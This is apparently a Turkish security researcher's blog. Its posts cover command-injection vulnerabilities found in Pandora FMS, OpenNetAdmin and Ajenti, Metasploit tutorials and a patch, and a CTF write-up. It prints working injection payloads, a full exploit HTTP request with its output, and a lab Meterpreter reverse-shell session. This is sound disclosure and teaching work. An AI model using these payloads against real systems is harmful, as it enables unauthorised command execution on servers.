Pandora 7.0NG RCE Exploit

Thu, 21 May 2020 00:00:00 +0000

Pandora FMS bilgisayar ağlarını izlemek için kullanılan bir yazılımdır. Pandora FMS, farklı işletim sistemleri, sunucular, uygulamalar ve güvenlik duvarları, proxy’ler, veritabanları, web sunucuları veya yönlendiriciler gibi donanım sistemlerinin durumunu ve performansını görsel olarak izlemeye olanak tanır. Perl ve PHP programlama dili ile geliştirilmiştir.

Pandora FMS 7.0NG sürümünde fark etmiş olduğum zafiyeti nasıl bulduğumu ve Metasploit için yazdığım exploiti inceleyeceğiz. Yazılımın websitesinden Vmware için olan imajını indirdim. Websitesinden aldığım root:pandora kullanıcı adı ve parolasını kullanarak SSH ile sunucuya bağlandım. İlk olarak netstat -tulpn ile açık olan portları inceledim. 80 portunda çalışan bir web sunucu olduğunu gördüm.

[root@pandorafms ~]# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1449/sshd           
tcp        0      0 0.0.0.0:8022            0.0.0.0:*               LISTEN      1241/anytermd       
tcp        0      0 0.0.0.0:8023            0.0.0.0:*               LISTEN      1215/anytermd       
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2046/master         
tcp        0      0 0.0.0.0:41121           0.0.0.0:*               LISTEN      2065/perl           
tcp6       0      0 :::3306                 :::*                    LISTEN      2050/mysqld         
tcp6       0      0 :::80                   :::*                    LISTEN      845/httpd           
tcp6       0      0 :::22                   :::*                    LISTEN      1449/sshd           
tcp6       0      0 ::1:25                  :::*                    LISTEN      2046/master         
udp        0      0 0.0.0.0:36165           0.0.0.0:*                           650/dhclient        
udp        0      0 0.0.0.0:68              0.0.0.0:*                           650/dhclient        
udp6       0      0 :::20626                :::*                                650/dhclient  

/var/www/html dizini altındaki dosyaları tar -zcvf /tmp/pandora.tar.gz pandora_console/ komutu ile sıkıştırıp scp root@192.168.1.15:/tmp/pandora.tar.gz pandora.tar.gz ile kendi bilgisayarıma indirdim.

Sunucuda while true; do ps aux | grep "AAAtest" | grep -v "grep" ; done komutunu çalıştırarak ve gönderdiğim inputları AAAtest ile değiştirerek çalıştırılan processlere etkilerini görmeye çalıştım.

Manage Agents menüsünde Network Tools içinde bulunan ping gönderme özelliğini kullanırken Burp Suite isimli proxy aracı ile araya girip ip kısmını AAAtest şeklinde değiştirip gönderdim.

[root@pandorafms ~]# while true; do ps aux | grep "AAAtest" | grep -v "grep" ; done
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest

Linux’da ; işareti kullanılarak tek satırda iki veya daha fazla komut sırayla çalıştırılabilir. Bu özelliği kullanarak ping komutundan sonra touch /tmp/test şeklinde bir komut çalıştırmaya çalıştım. Sunucu tarafında bu komutun nasıl çalıştığını görmek için grep’teki AAAtest kısmını ping ile değiştirdim.

[root@pandorafms ~]# while true; do ps aux | grep "ping" | grep -v "grep" ; done
apache    4239  0.0  0.0  11628  1356 ?        S    02:17   0:00 sh -c /usr/bin/ping -c 5 ;touch&#x20;/tmp/test
apache    4243  0.0  0.0  11628   196 ?        R    02:17   0:00 sh -c /usr/bin/ping -c 5 ;touch&#x20;/tmp/test
apache    4247  0.0  0.0  11628   196 ?        R    02:17   0:00 sh -c /usr/bin/ping -c 5 ;touch&#x20;/tmp/test

Yukarıda da gözüktüğü gibi boşluk karakteri yerine   şeklinde HTML encoding uygulanıyordu. Bu durumdan kurtulmak için Linux’da bulunan $IFS özelliğini kullandım. Payload’u ;touch$IFS/tmp/test şeklinde gönderdiğimde komut çalıştı ve /tmp dizininde test adındaki dosya oluştu.

Sunucudan indirdiğim dosyaları incelediğimde sorunun net_tools.php dosyasındaki 179. satırındaki system fonksiyonuna gelen ip değişkeninin yetersiz kontrolünden kaynaklanmaktadır.

...
case 2:
  $ping = whereis_the_command ('ping');
  if (empty($ping)) {
  	ui_print_error_message(__('Ping executable does not exist.'));
  }
  else {
  	echo "<h3>" . __("Ping to %s", $ip) . "</h3>";
  	echo "<pre>";
  	echo system ("$ping -c 5 $ip");
  	echo "</pre>";
  }
  break;
...

Yazmış olduğum exploit’in tamamını linkten inceleyebilirsiniz.

Metasploit Array Handling

Sat, 22 Feb 2020 00:00:00 +0000

When developing exploit for OpenNetAdmin , more than one values sent with the same parameter.

vars_post = {
      'xajax'       => 'window_submit',
      'xajaxargs[]' => 'tooltips',
      'xajaxargs[]' => 'ip%3D%3E;#{filter_bad_chars(cmd)};',
      'xajaxargs[]' => 'ping'
    }

However, when using vars_post in Metasploit, the values were received as hash, and when trying to send it as above, the error was encountered. The request that sent looks like xajax=window_submit&xajaxargs%5B%5D=ping

With the change I made in the client_request.rb file, array handling support was added to POST request.

opts['vars_post'].each_pair do |var,val|
  var = var.to_s
  unless val.is_a?(Array)
    val = [val]
  end
  val.each do |v|
    v = v.to_s
    pstr << '&' if pstr.length > 0
    pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
    pstr << '='
    pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
  end
end

Metasploit has started to accept the values to be sent with the same parameter as below as an array.

vars_post = {
      'xajax'          => 'window_submit',
      'xajaxargs[]' => ['tooltips', 'ip=>;#{cmd};', 'ping']
    }

Metasploit Dizi İşleme Desteği

Fri, 21 Feb 2020 00:00:00 +0000

OpenNetAdmin için exploit geliştirirken aynı parametre ile birden fazla değer gönderilmekteydi.

vars_post = {
      'xajax'       => 'window_submit',
      'xajaxargs[]' => 'tooltips',
      'xajaxargs[]' => 'ip%3D%3E;#{filter_bad_chars(cmd)};',
      'xajaxargs[]' => 'ping'
    }

Fakat Metasploit’te vars_post kullanılırken değerler hash olarak alındığı için yukarıdaki gibi gönderilmeye çalıştığında hata ile karşılaşılmaktaydı ve giden istek xajax=window_submit&xajaxargs%5B%5D=ping şeklinde gözükmekteydi.

client_request.rb dosyasında yapmış olduğum değişiklik ile post atılırken dizi işleme desteği eklenmiştir.

opts['vars_post'].each_pair do |var,val|
  var = var.to_s
  unless val.is_a?(Array)
    val = [val]
  end
  val.each do |v|
    v = v.to_s
    pstr << '&' if pstr.length > 0
    pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
    pstr << '='
    pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
  end
end

vars_post içerisinde gelen anahtar-değer çifti ‘var’ ve ‘val’ olarak alınmıştır. var string’e çevrilip val’ın dizi olup olmadığı kontrol edilmiştir. Eğer dizi değil ise diziye çevrilmiştir.

val dizisi v olarak döngüde kullanılıp gelen her değer string’e çevrilip anahtar ile birleştirilip “pstr” değişkenine atanmıştır.

Metasploit aşağıdaki gibi aynı parametre ile gönderilecek değerleri dizi olarak da kabul etmeye başlamıştır.

vars_post = {
      'xajax'          => 'window_submit',
      'xajaxargs[]' => ['tooltips', 'ip=>;#{cmd};', 'ping']
    }

Metasploit Exploit Geliştirme - 3

Tue, 04 Feb 2020 00:00:00 +0000

HTTP istekleri göndermek

Modül yazarken HTTP istekleri göndermemiz ve cevabını alıp ayrıştırmamız gerekebilir. HTTP istekleri gönderebilmek için include Msf::Exploit::Remote::HttpClient satırı modüle eklenmelidir.

send_request_cgi({
	'method'   => 'GET',
	'uri'      => '/index.php',
	'vars_get' => {
		'parametre1' => 'test1',
		'parametre2' => 'test2'
	}
})

Yukarıdaki örnekte örnek bir GET isteği gösterilmiştir. Örneğin test/index.php gibi bir url oluşturulamaya çalıştığımızda / işaretleri bazen çift konulabilmekte veya eksik kalabilmektedir. Bu durum sık yapılan hatalardandır. Güvenli şekilde url oluşturabilmek için normalize_uri kullanılır.

1 – Çalışan uygulama bir dizin altında çalıştığı zaman bunu belirtmek için TARGETURI datastore’a kaydedilir.

register_options(
	[
		OptString.new('TARGETURI', [true, 'Varsayılan Dizin', '/uygulama/'])
	], self.class)


res = send_request_cgi({
	'method'   => 'GET',
	'uri'      => normalize_uri(target_uri, 'admin', 'login.php'),
				# "/uygulama/admin/login.php" döndürür.
	'vars_get' => {
		'parametre1' => 'test1',
		'parametre2' => 'test2'
	}
})

Örnek bir POST isteği de alttaki gibidir.

res = send_request_cgi({
	'method'   => 'POST',
	'uri'      => normalize_uri(uri, 'admin', 'login.php'),
	'vars_post' => {
		'parametre1' => 'test1',
		'parametre2' => 'test2'
	}
})

HTTP Response ayrıştırma

Gelen response objesini res değişkenine atadık.

data = res.body

ile response’un body kısmını alabiliriz. HTTP yanıtını string olarak almak istersek

raw_res = res.to_s

ile alabiliriz.

Nokogiri kütüphanesi ile HTTP response’unu parçalayarak istediğimiz kısımı alabiliriz.

html = res.get_html_document
greeting = html.at('div')

Örnekte div tag’ı olan yerler bulunmuştur.

https://github.com/rapid7/metasploit-framework/wiki/How-to-parse-an-HTTP-response

surum = res.body.scan(/Version  = "(.*?)"/).flatten.first.to_s

Yukarıdaki örnekte Version = “2.3.4” geçen yer response içerisinde bulunarak 2.3.4 değeri surum değişkenine atanmıştır.

Burp Suite ile çalışma

Burp Suite, HttpClient kullanarak bir modül geliştirirken HTTP trafiğini incelemek veya değiştirmek içinde kullanışlı bir araçtır. Bunu yapmak için:

Burp Suite’i çalıştırın.
Çalışmak istediğininiz modülü use ile seçin.
set Proxies HTTP:127.0.0.1:8080
Modül çalıştırıldığında HTTP trafiğinine müdahale edebilmelidir.

OpenNetAdmin 18.1.1 Command Injection

Wed, 25 Dec 2019 00:00:00 +0000

OpenNetAdmin; DNS adresleri, IP adresleri, Alt ağlar, MAC adresleri gibi ağ ayarlarını yapmayı ve izlemeyi sağlayan IPAM (IP Adres Yönetimi) aracıdır. Eklentileri kullanarak daha fazla özellik eklenebilmektedir. Php programlama dili ile geliştirilmiştir.

OpenNetAdmin’in 8.5.14 ve 18.1.1 arasındaki sürümlerindeki zafiyetten dolayı komut enjekte edilerek sunucu üzerinde çalıştırılabilmektedir.

# ona/www/winc/tooltips.inc.php

function ws_ping($window_name, $form='') {
    // If an array in a string was provided, build the array and store it in $form
    $form = parse_options_string($form);
    $output = shell_exec("ping -n -w 3 -c 3 {$form['ip']}");
    $window['title'] = 'Ping Results';
    $build_commit_html = 0;
    $commit_function = '';
    include(window_find_include('module_results'));
    return(window_open("{$window_name}_results", $window));
}

Yukarıdaki kod bloğunda OpenNetAdmin’in 18.1.1 sürümünde ping göndermek için kullanılan fonksiyon verilmiştir. Web tarayıcı üzerinden gönderilen ip adresi $output = shell_exec("ping -n -w 3 -c 3 {$form['ip']}"); satırında kullanılmıştır.
shell_exec fonksiyonu içine yazılan komutu kabukta çalıştırır ve çıktının tamamını bir string olarak döndürür. Post metodu ile alınan $form['ip'] değeri fonksiyon içinde kontrol edilmeden kullanılması bu zafiyete sebep olmaktadır.

POST /ona/login.php HTTP/1.1
Host: 172.16.172.157
Connection: keep-alive
Content-Length: 98
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr,tr-TR;q=0.9,en-US;q=0.8,en;q=0.7

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D>;id;&xajaxargs[]=ping

Eğer yukarıdaki gibi bir HTTP isteği gönderirsek dönen cevabın içinde çalıştırdığımız id komutunun cevabı da gelecektir.

....
<td align="left" class="padding">
    <br>
    <div style="border: solid 2px #000000; background-color: #FFFFFF; width: 650px; height: 350px; overflow: auto;resize: both;">
        <pre style="padding: 4px;font-family: monospace;">uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
    </div>
</td>
....

Yazmış olduğum exploit’e buradan erişebilirsiniz.

Metasploit Exploit Geliştirme - 2

Fri, 13 Dec 2019 00:00:00 +0000

Metasploit Framework

Metasploit sızma testlerinde en çok kullanılan exploit framework’üdür. İçerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Ruby dili ile yazılmıştır.

Linux ve Mac OS X’de kurulumu

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Kullanımı

msfconsole komutu ile başlatılır.

search modüller içinde arama yapmayı sağlar. Arama sonucunu daraltabileceğiniz parametrelere sahiptir. (help search)

info ile herhangi bir modül hakkında detaylı bilgileri inceleyebiliriz.
(info exploit/unix/ftp/vsftpd_234_backdoor)

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm <x@hdm.io>
  MC <mc@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the
  VSFTPD download archive. This backdoor was introduced into the
  vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
  according to the most recent information available. This backdoor
  was removed on July 3rd 2011.

References:
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf5 exploit(unix/ftp/vsftpd_234_backdoor) >

use ile kullanılacak olan modül seçilir. (use exploit/unix/ftp/vsftpd_234_backdoor)

show

show komutu parametresiz olarak kullanılırsa metasploit içerisindeki tüm modüllerin listesini gösterir.
Herhangi bir tipteki modülleri görmek istersek show ile kullanarak o tipteki tüm modülleri görebiliriz. (show auxiliary)
show options ile seçili modülün değişkenlerini görebiliriz.
show payloads ile seçilebilecek olan payloadları görebiliriz.
show targets ile hedef türünü değiştirebiliriz.

set komutu ile parametreleri değiştirebiliriz. (set RHOSTS 192.168.1.14)
exploit komutu ile seçilen exploit’i çalıştırabiliriz.

msf5 > use exploit/unix/webapp/ajenti_auth_username_cmd_injection
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > show options

Module options (exploit/unix/webapp/ajenti_auth_username_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8000             yes       The target port (TCP)
   SSL        True             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Ajenti == 2.1.31


msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.154
RHOSTS => 172.16.172.154
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1
LHOST => 172.16.172.1
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > check
[*] 172.16.172.154:8000 - The target appears to be vulnerable.
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit

[*] Started reverse TCP handler on 172.16.172.1:4444
[*] Exploiting...
[*] Sending stage (53755 bytes) to 172.16.172.154
[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.154:34840) at 2019-12-15 16:22:04 +0300

meterpreter >

Dışarıdan indirilen bir modülü Metasploit ile kullanmak için modules/exploits adında dizin oluşturup .rb dosyası oluşturulan dizinin içine atılır.

mkdir -p modules/exploits
cd modules/exploits
nano ajenti_test.rb

Metasploit’de loadpath /home/user/Desktop/modules şeklinde oluşturduğunuz yol eklenir.

msf6 > loadpath ~/modules
Loaded 1 modules:
    1 exploit modules
msf6 > use exploit/ajenti_test
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(ajenti_test) >

Eklenen modül içerisinde değişiklik yapıldığında bu değişikliğin geçerli olması için “reload” komutu çalıştırılır.

Eğer eklediğiniz modülün her Metasploit çalıştığında otomatik olarak içeri aktarılmasını isterseniz ~/.msf4/modules altına atmanız gerekir. Buraya atılan modüller açılışta otomatik olarak içeri aktarılır.

cd ~/.msf4/modules/exploits
nano ajenti_test.rb
cd ~/tools/metasploit-framework/
metasploit-framework git:(master) ./msfconsole -q
msf6 > use exploit/ajenti_test
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(ajenti_test) >

Metasploit Exploit Geliştirme - 1

Thu, 12 Dec 2019 00:00:00 +0000

Temel Kavramlar

Vulnerability

Herhangi bir yazılımın içerisinde yer alan sistem hatalarıdır. Bu zafiyetler;

bir servisten(smb),
bir plugin/eklentiden(wordpress eklentileri),
Bir yazılımdan(firefox),
hatalı/eksik kod yazımından(xss, sqli) kaynaklanabilir.

Exploit

Exploit kelime anlamı olarak bir şeyi kendi avantajına kullanmak demektir. İstenmeyen yada beklenmeyen bir duruma neden olmak için bir hata veya güvenlik açığından yararlanan koddur. Bu genelde sistemi ele geçirme, yetki yükseltme, hizmet dışı bırakma ve bilgi ele geçirme için kullanılır.

Bu noktada exploitler bazı kriterlere göre gruplara ayrılmıştır. Genel hatlarıyla exploit türlerine baktığımızda bunlar;

Remote Exploit
Local Exploit
Dos Exploit
Web App Exploit
Zero Day Exploit
One Day Exploit

olarak 6 gruba ayırmak mümkündür.

Remote Exploit

İstismar edilecek sisteme sadece uzaktan erişimin yeterli olduğu exploit türüdür. Genellikle dışarıya portları açık olan servislerde görülür.

Local Exploit

İstismar edilecek sisteme erişimin olmasının yanında sistem üzerinde erişim sağlanacak bir hesabında olmasını gerektiren exploit türüdür. Örneğin; Paylaşımlı hostinglerde, sadece bir web hostun hacklenerek elde edilen düşük seviyeli kullanıcı hesabından (local)exploit çalıştırarak sunucuda root haklarına sahip olmaya çalışmak.

(D)Dos Exploit

Sistemin kendisini veya sistemde var olan bir servisi hizmet veremeyecek duruma getiren exploit türüdür. Sisteme herhangi bir sızma söz konusu değildir. Tek bir kaynaktan yapıldığında dos, dağıtılmış bir şekilde bir çok noktadan tek bir noktaya yapılan saldırı türlerine ise ddos denir.

Zero Day Exploit

Daha önce keşfedilmeyen bir zafiyet bulup bunu istismar edecek exploit kodunu yazan kişiden(grup) başka kimsenin bilmediği zafiyettir/exploittir. Zafiyete söz konusu olan firma/ürün bile exploit public edildiği zaman haberdar olur. Ayrıca zafiyet ortaya çıktıktan sonra geliştirici tarafından bir güncelleme sunulamadan önce faydalanılan bir exploittir.

One Day Exploit

Public edilen zero day exploitin etkilediği yazılım patch geçmesine rağmen zafiyetli sürümün hala son kullanıcılar arasında yaygın bir şekilde kullanılmasından dolayı exploitten etkilendiği exploit çeşididir.

Encoders

Sistemde bulunan antivirüs, firewall, ips/ids gibi korunma sistemlerine yakalanmamak için (bypass) gönderilecek olan zararlı kodların (payload) encode işleminden geçirilmesi sonucu zararlı yazılımın sistem tarafından tespit edilmesini zorlaştıran araçlardır.

Auxiliary

Hedef sistem hakkında bilgi toplamak için yapılan taramalardır. Path traversial, local file download, file read gibi zafiyetleri istismar etmek için auxiliary modülleri vardır. Bunlar saldırgana herhangi bir shell oturumu vermediklerinden exploit olarak değerlendirilmezler.

Payload

Exploit sonrası hedef sistemde çalışacak olan kodlardır. Platforma ve işletim sistemine bağlıdırlar. Meterpreter, dll injection, binary upload en sık kullanılan payloadlar arasında gösterilebilir.

Üç grupta incelenebilirler.

Stagers
Stages
Single(Inline / Non Staged)

Stagers

Hedef ile saldırgan arasındaki veri iletişiminin sağlanması için gerekli bağlantıyı sağlar. Boyutu küçüktür. Bağlantı kurulduktan sonra büyük boyutlu olan payloadları hedef makineye göndermekle sorumludurlar. En çok kullanılanlar arasında bind_tcp, reverse_tcp, http_tcp, reverse_http, bind_http gösterilebilir.

Stages

Stagers ile bağlantı sağlandıktan sonra hedef sisteme gönderilerek çalıştırılacak olan payloadlardır. Hedef sistem üzerinde birçok post exploit işlemi gerçekleştirebilirler. Büyük boyutlu ve komplexdirler. Meterpreter, vnc injection, ipwn örnek olarak gösterilebilir.

Stagers(stage0 olarak da geçer) ve stages(stage1 olarak de geçer)’in en belirgin özellikleri aşağıdaki gibidir.

Initial shellcode (Stage0, stagers) saldırganın makinesine bağlantı isteği gönderebilir. Bu genellikle reverse_* olur.
Stege0 hedef sisteme bir kez yüklendikten sonra kendisinden sonra gelecek olan payloadları belleğe yerleştirip çalıştırmasından sorumludur.
Stege0’dan sonra boyut olarak daha büyük olan stage1 payloadı gönderilir ki bu shell oturumu veren payload da olabilir veya daha komplex olan bir meterpreter oturumu da olabilir.

Singles (Inline / Non Staged)

İhtiyaç duyduğu bütün bileşenleri içinde barındırır. Belli bir işi yapmak kullanılırlar. Stage payloadlara göre daha küçük boyutludur. Örneğin, hedef sisteme bir kullanıcı ekleyen payload, işlemini yapar ve durur. Başka bir komut satırına ihtiyaç duymaz.

Ajenti 2.1.31 Command Execution Exploit

Thu, 12 Dec 2019 00:00:00 +0000

def authenticate(self, username, password):
       child = None
       try:
           child = pexpect.spawn('/bin/sh', ['-c', '/bin/su -c "/bin/echo SUCCESS" - %s' % username], timeout=5)
           child.expect('.*:')
           child.sendline(password)
           result = child.expect(['su: .*', 'SUCCESS'])
       except Exception as err:
           if child and child.isalive():
               child.close()
           logging.error('Error checking password: %s', err)
           return False
       if result == 0:
           return False
       else:
           return True

Yukarıdaki kod bloğunda Ajenti’nin 2.1.31 sürümünde kimlik doğrulaması için kullanılan fonksiyon verilmiştir.

Pexpect, Python üzerinden diğer yazılımları kontrol etmemize yardımcı olan bir modüldür. Pexpect çocuk süreç başlatmamızı, onları kontrol etmemizi ve beklenen kalıplarda cevap vermemizi sağlar. spawn sınıfı ile çocuk süreç oluşturulur. Expect ve sendline kullanılarak beklenen input’a cevap verilir.

  
child = pexpect.spawn('/bin/sh', ['-c', '/bin/su -c "/bin/echo SUCCESS" - %s' % username], timeout=5)
child.expect('.*:')
child.sendline(password)

kodu ile username değişkeninde alınan kullanıcının yetkileri ile su -c “/bin/echo SUCCESS” komutu çalıştırılmaya çalışılır. Parola doğru girilir ise ekrana SUCCESS mesajı basılır.

  
result = child.expect(['su: .*', 'SUCCESS'])

satırı ile Ekrana basılan çıktı result değişkenine atanır. Parola doğru girilmiş ise authenticate fonksiyonu True döndürür.

Backtick (`) arasına yazılanlar Linux’da komut olarak algılanır ve çalıştırılır. Örneğin komut satırı üzerinde echo `whoami` komutunu çalıştırırsanız çıktıda sizin kullanıcı adınızı ekrana bastıracaktır.

POST /api/core/auth HTTP/1.1
Host: 172.16.172.152:8000
Connection: keep-alive
Content-Length: 56
Accept: application/json, text/plain, */*
Origin: http://172.16.172.152:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: tr,tr-TR;q=0.9,en-US;q=0.8,en;q=0.7

{"username":"deneme","password":"12345","mode":"normal"}

Eğer giriş formunda kullanıcı adı yerine ` ` işaretleri içerisini bir komut yazarsak bu komut sistem üzerinde çalıştırılacaktır. Fakat ekranda bir çıktı gözükmeyecektir.

Yazmış olduğum exploit’e buradan erişebilirsiniz.

Siber Yıldız 2019 Çözümleri

Sun, 03 Feb 2019 00:00:00 +0000

Bilgi Teknolojileri ve İletişim Kurumu tarafından düzenlenen ve 1 Şubat akşamı başlayıp 24 saat süren CTF’in çözümleri.

Bu Gerçekten Kolay

Sorudaki dosyayı indirip strings aracı ile baktığımızda flag direkt çıkıyordu.

Hala ısınmalardasın

Sayfanın kaynak koduna baktığımızda obfuscate edilmiş bir javascript kodu vardı.

\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65

Kısmını herhangi bir hex çevirme aracına atarsak fromCharCode yazdığını görüyoruz. Bu aşamada bu siteyi kullanabilirsiniz. FromCharCode fonksiyonu girilen Unicode değerlerini karakterlere çevirir. Bu işlem için de linkteki siteyi kullanabilirsiniz.
Veya daha kısa bir çözüm yolu olarak koddaki eval fonksiyonunu kaldırıp tarayıcının javascript consoluna yapıştırırsanız flagi verecektir.

Herşey Sanal Ağ Gerçek

network01.zip dosyasını indirdiğimizde içinde network-150.pcap dosyası çıkıyor. Wireshark aracı ile incelemeye başladığımızda 851. frame’de sslkeylog.log isminde bir dosyanın indirildiğini görüyoruz.

Wireshark’da pcap üzerindeki dosyaları indirmek için File>Export Objects>HTTP menüsüne tıklarsak HTTP üzerinden geçen dosyaları görebilir ve save butonu ile kayıt edebilirsiniz. Burada benim için önemli olan sslkeylog.log dosyasını bilgisayarıma kayıt ediyorum. Peki ne işe yarar bu dosya? Pre-master secret log dosyasına sahip isek sunucu anahtarına sahip olmasak bile ssl üzerinden geçen trafiğin şifresini çözebiliriz.

# SSL/TLS secrets log file, generated by NSS
CLIENT_RANDOM 3c059964842e18ec3b9c53849f09efd9d1108d642b7924193e55f08555858758 27f60b710d7835657c6d5fe36b6bc1f340a71df91226542bbf296c15a939be9e617e7a94662bfdbc190bf9b69f44f4ad

Artık bu dosyaya sahip olduğumuza göre bunu Wireshark’a ekleyebiliriz. Edit>Preferences’e tıklayıp sol menüden Protocols>SSL ‘i seçiyoruz. (Pre)-Master-Secret log filename kısmından indirdiğimiz dosyayı seçip kaydediyoruz. Artık SSL üzerinden geçen trafiği de okuyabiliriz.

798 Frame’de 99037582138585721057129547823.pkt isminde bir dosyaya istekte bulunulmuş. İsteği daha ayrıntılı görmek için üzerine sağ tıklayıp Follow>Http Stream derseniz giden Get isteğini görebilirsiniz. Sonuç 200 yani olumlu dönmüş ama herhangi bir dosya gelmemiş. Bende bu soruyu indirdiğim sunucudan aynı dosyayı indirmeye çalıştığımda dosya indi.

http://85.111.95.19/53ebbeb47594621b58376210b90269ad-network01/99037582138585721057129547823.pkt

Ufak bir araştırma ile inen dosyanın Cisco’nun kendi cihazları için geliştirdiği bir network simulator olan Cisco Packet Tracer tarafından kullanıldığını görüyoruz. Hemen ilgili programı indirip dosyayı açtım.
Ortada bulunan router’a çift tıklayıp Config menüsüne geldiğimizde dışarıya aktarabileğimiz config dosyaları çıkıyor. Startup Config dosyasını dışarı aktarıyorum. Dışarı aktardığı config dosyasının 22. Satırında kullanıcı adı ve kullanıcının parolası tutuluyor.

username usom password 7 0200085A0C5C022519061B49100317193C2439386D

Linkteki aracı kullanıyoruz.

Oburix’in Şifresi

Sorudaki dosyayı indirip wireshark ile açıyoruz. 156. frame’de usom.png isminde bir resim geçtiği gözüküyor. İlgili frame’e OBEX Protocol>Portable Network Graphics’e sağ tıklıyoruz ve Show Packet Bytes’ a basıyoruz.

Ve flag karşımızda.

Reklam arası bitti film başlıyor

dump.scm dosyasının uzantısı olan scm hakkında araştırma yaptığımızda Samsung televizyonların kanal listesini tutan bir backup dosyası olduğunu görüyoruz. Dosyanın içeriğini görüntülemek için http://samschanneledit.sourceforge.net/ programını indirebilirsiniz. Map-SateD menüsünde kanallar arasında USOM TV ve bir link var.

Hızlıca linke giriyoruz ve Interstellar filmini karşımızda buluyoruz. Kısa bir süreliğine soru çözmeye ara verip keyifle filmin sahnesini izlerken arkadan kötü bir cızırtı sesi geliyor. Hemen videoyu indirip mp3’e çevirdim ve Sonic Visualiser programı ile incelemeye başladım.
Layer>Add Spectrogram>All Channels seçeneğine tıkladım. Cızırtının geldiği saniyeye geldiğimde flag karşıma çıktı.

Bir bakan var, bir de aranan

Soruya girdiğimizde alttaki hash karşıma çıktı.

0827206450376af3dce61d788ddeba21f58dba35257fdb43c1872c096a36287f

Virustotal üzerinden hashi arattığımda alttaki yorumda bize bir mobil uygulama linki verilmiş.

https://www.virustotal.com/tr/file/0827206450376af3dce61d788ddeba21f58dba35257fdb43c1872c096a36287f/analysis/  

Apktool aracını kullanarak apk içindekileri çıkartıyorum. Res/drawable içinde 11 adet resim vardı.

binwalk *.jpg --dd '.*'

komutu ile tüm resimlerin içinde başka bir şey var mı diye bakıyorum. Birçok resimde birbirinin aynısı olan bir zip eklenmişti. Fakat ortakoy.jpg içerisinde diğerlerinden farklı şifrelenmiş bir zip dosyası vardı.

Ve dikkat çeken başka bir resim vardı.
Bu resme exiftool ile baktığımızda

Rights: =?ufh]5%T7R2mGvQU?<n

Bunu az önce bulduğumuz şifrelenmiş zip’e denediğimizde açılıyor ve içinde uzun bir base64 kodu çıkıyor.

cat hadibul.b64 | base64 --decode > hadibul

Komutunu kullanarak dosyanın içindeki base64’ü binary formatta hadibul isminde bir dosyaya yazıyoruz. Dosyaya “file hadibul” şeklinde bakıldığında zip olarak gösteriyor. İçeriğini kontrol ettiğimizde bunun bir APK olduğunu anlıyoruz. Apk’yı bir emülatöre kurup çalıştırdım.

Flag çıkan yazının md5 hashlenmiş haliydi.

DKHOS CTF WRITE-UP

